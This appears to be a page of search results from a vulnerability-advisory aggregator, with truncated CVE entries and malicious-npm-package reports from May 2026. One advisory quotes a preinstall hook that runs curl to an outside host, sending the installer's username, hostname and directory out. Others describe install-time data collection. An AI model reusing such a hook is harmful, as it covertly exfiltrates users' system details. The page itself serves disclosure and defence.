Lucene search
K

40552 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/20 5:58 p.m.8 views

Malicious code in @self-evolving-harness/kivo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ce31b5c287727dabb5479a114843b06b80bbd75db10d74014a00db80b9b321bd The package's LLM pipeline Kivo.ingest → value-gate → OpenAILLMProvider resolves its endpoint via resolveLlmConfig in...

5.8AI score
Exploits0References1
OSV
OSV
added 2026/05/20 5:58 p.m.3 views

MAL-2026-4433 Malicious code in @self-evolving-harness/kivo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ce31b5c287727dabb5479a114843b06b80bbd75db10d74014a00db80b9b321bd The package's LLM pipeline Kivo.ingest → value-gate → OpenAILLMProvider resolves its endpoint via resolveLlmConfig in...

5.8AI score
Exploits0References1
Cvelist
Cvelist
added 2026/05/20 5:43 p.m.24 views

CVE-2026-24218

NVIDIA DGX OS contains a vulnerability in the factory provisioning process, where the cloning of a base image causes identical SSH host keys to be deployed across multiple systems. The sharing of cryptographic identifiers across all similarly provisioned systems enables host impersonation or...

8.1CVSS0.00031EPSS
Exploits0References3
CVE
CVE
added 2026/05/20 5:43 p.m.14 views

CVE-2026-24218

CVE-2026-24218 affects NVIDIA DGX OS. The vulnerability arises during factory provisioning: cloning a base image deploys identical SSH host keys across multiple systems, enabling host impersonation or attacker-in-the-middle attacks. Consequences listed include potential code execution, data tampe...

8.1CVSS5.8AI score0.00031EPSS
Exploits0References3Affected Software1
ATTACKERKB
ATTACKERKB
added 2026/05/20 5:43 p.m.6 views

CVE-2026-24218

NVIDIA DGX OS contains a vulnerability in the factory provisioning process, where the cloning of a base image causes identical SSH host keys to be deployed across multiple systems. The sharing of cryptographic identifiers across all similarly provisioned systems enables host impersonation or...

8.1CVSS5.8AI score0.00031EPSS
Exploits0References4
Vulnrichment
Vulnrichment
added 2026/05/20 5:43 p.m.7 views

CVE-2026-24218

NVIDIA DGX OS contains a vulnerability in the factory provisioning process, where the cloning of a base image causes identical SSH host keys to be deployed across multiple systems. The sharing of cryptographic identifiers across all similarly provisioned systems enables host impersonation or...

8.1CVSS5.8AI score0.00031EPSS
Exploits0References3
EUVD
EUVD
added 2026/05/20 5:43 p.m.7 views

EUVD-2026-31142

NVIDIA DGX OS contains a vulnerability in the factory provisioning process, where the cloning of a base image causes identical SSH host keys to be deployed across multiple systems. The sharing of cryptographic identifiers across all similarly provisioned systems enables host impersonation or...

8.1CVSS5.8AI score0.00031EPSS
Exploits0References3
RedHat Linux
RedHat Linux
added 2026/05/20 5:28 p.m.7 views

net/url: Incorrect parsing of IPv6 host literals in net/url

The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid...

7.5CVSS7.3AI score0.00044EPSS
Exploits0References8
RedHat Linux
RedHat Linux
added 2026/05/20 5:1 p.m.7 views

net/url: Incorrect parsing of IPv6 host literals in net/url

The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid...

7.5CVSS7.3AI score0.00044EPSS
Exploits0References8
RedHat Linux
RedHat Linux
added 2026/05/20 4:56 p.m.5 views

net/url: Incorrect parsing of IPv6 host literals in net/url

The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid...

7.5CVSS7.3AI score0.00044EPSS
Exploits0References8
RedHat Linux
RedHat Linux
added 2026/05/20 4:45 p.m.6 views

net/url: Incorrect parsing of IPv6 host literals in net/url

The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid...

7.5CVSS7.3AI score0.00044EPSS
Exploits0References8
OSV
OSV
added 2026/05/20 4:6 p.m.1 views

MAL-2026-4185 Malicious code in uolcs-host-uol-anuncios-fe (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16d9407c815fe2d5593da029ee806d455d15f451d1c84d3cd8d6a0a027821d64 Package claims an internal-scope corporate name uolcs-host-uol-anuncios-fe on public npm, version-pinned to 99.99.99 — the canonical...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/20 4:6 p.m.4 views

Malicious code in uolcs-host-uol-anuncios-fe (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16d9407c815fe2d5593da029ee806d455d15f451d1c84d3cd8d6a0a027821d64 Package claims an internal-scope corporate name uolcs-host-uol-anuncios-fe on public npm, version-pinned to 99.99.99 — the canonical...

5.8AI score
Exploits0References1
Snyk
Snyk
added 2026/05/20 3:35 p.m.6 views

User Impersonation

Overview symfony/security-http is a provides an infrastructure for sophisticated authorization systems, which makes it possible to easily separate the actual authorization logic from so called user providers that hold the users credentials. Affected versions of this package are vulnerable to User...

9.3CVSS5.8AI score
Exploits0References2
OSV
OSV
added 2026/05/20 3:33 p.m.3 views

GHSA-GJ84-924C-48FX Algernon: Auto-refresh SSE event server binds to all interfaces by default on Linux/macOS

Summary The SSE event server bound to 0.0.0.0:5553 on Linux/macOS by default because the platform-dependent host default in engine/flags.go:39-46 set host = "" for non-Windows, and utils.JoinHostPort"", ":5553" resolves to ":5553" — a Go http.Server.Addr of ":5553" listens on every interface. On...

4.3CVSS5.8AI score0.00006EPSS
Exploits0References2
RedHat Linux
RedHat Linux
added 2026/05/20 2:29 p.m.6 views

kernel: Read root-owned files as an unprivileged user

A vulnerability was found in the Linux kernel that allows an unprivileged local user to read sensitive files normally restricted to the root user. The flaw occurs during process exit, where a brief window allows an attacker to intercept file access from a privileged process before it fully...

7.1CVSS5.8AI score0.00007EPSS
Exploits4References7
OSV
OSV
added 2026/05/20 2:2 p.m.4 views

MAL-2026-4605 Malicious code in mamadoos-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 21b5454856fbb360a162083d9d582eba3839b7105ce6e36490e188b3729388d4 package.json declares a preinstall lifecycle hook that runs curl https://huntr.site/depconf/$whoami@$hostname?pwd=$pwd, embedding the installer's OS...

5.8AI score
Exploits0References3
RedHat Linux
RedHat Linux
added 2026/05/20 1:35 p.m.2 views

kernel: Read root-owned files as an unprivileged user

A vulnerability was found in the Linux kernel that allows an unprivileged local user to read sensitive files normally restricted to the root user. The flaw occurs during process exit, where a brief window allows an attacker to intercept file access from a privileged process before it fully...

7.1CVSS5.8AI score0.00007EPSS
Exploits4References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/20 1:17 p.m.9 views

Malicious code in gator-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1925735d02fb91f74a11718c3402ad0b10f551eecb8c6d88f02d475b3e0a799f On npm install via scripts.install: node index.js and on every require'gator-client', lib/core.js collects os.userInfo.username, os.hostname, and the...

5.9AI score
Exploits0References1
OSV
OSV
added 2026/05/20 1:17 p.m.5 views

MAL-2026-4569 Malicious code in gator-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1925735d02fb91f74a11718c3402ad0b10f551eecb8c6d88f02d475b3e0a799f On npm install via scripts.install: node index.js and on every require'gator-client', lib/core.js collects os.userInfo.username, os.hostname, and the...

5.9AI score
Exploits0References1
Rows per page
Query Builder